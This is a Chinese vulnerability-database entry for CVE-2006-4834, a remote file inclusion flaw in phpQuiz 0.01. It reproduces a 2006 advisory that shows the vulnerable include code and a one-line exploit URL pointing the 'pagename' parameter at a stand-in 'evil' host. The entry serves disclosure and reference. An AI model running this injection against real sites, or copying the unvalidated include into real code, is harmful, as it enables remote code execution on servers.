Jule Slootbeek phpQuiz 'index.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111038 漏洞类型 输入验证
发布时间 2006-09-14 更新时间 2006-09-19
CVE编号 CVE-2006-4834 CNNVD-ID CNNVD-200609-291
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2366
https://cxsecurity.com/issue/WLB-2006090115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-291
|漏洞详情
JuleSlootbeekphpQuiz0.01的index.php中存在PHP远程文件包含漏洞,远程攻击者可以通过pagename参数中的URL执行任意PHP代码。
|漏洞EXP
#############################SolpotCrew Community################################
#
#  phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion
#
#  Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (14-09-2006)
#
#       contact: chris_hasibuan@yahoo.com
#
#       Website : http://www.nyubicrew.org/adv/solpot-adv-07.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ ,#nyubi , #hitamputih @dalnet
#              and all member solpotcrew community @ http://www.nyubicrew.org/forum/
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "pagename" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 
code from index.php
<?php
 //include global variables.
 include('global.inc.php');
 if (empty($pagename)) $pagename=main_menu;
 require ("$pagename.php");
?>
exploit : http://somehost/path_to_phpQuiz/index.php?pagename=http://evil
##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F################################## 

# milw0rm.com [2006-09-14]
|参考资料

来源:BID
名称:20019
链接:http://www.securityfocus.com/bid/20019
来源:BUGTRAQ
名称:20060914SolpotCrewAdvisory#9-phpQuizv0.01designandcodingbyJuleSlootbeek(pagename)RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/446039/100/0/threaded
来源:MISC
链接:http://www.nyubicrew.org/adv/solpot-adv-07.txt
来源:VUPEN
名称:ADV-2006-3611
链接:http://www.frsirt.com/english/advisories/2006/3611
来源:XF
名称:phpquiz-index-file-include(28947)
链接:http://xforce.iss.net/xforce/xfdb/28947
来源:SREASON
名称:1587
链接:http://securityreason.com/securityalert/1587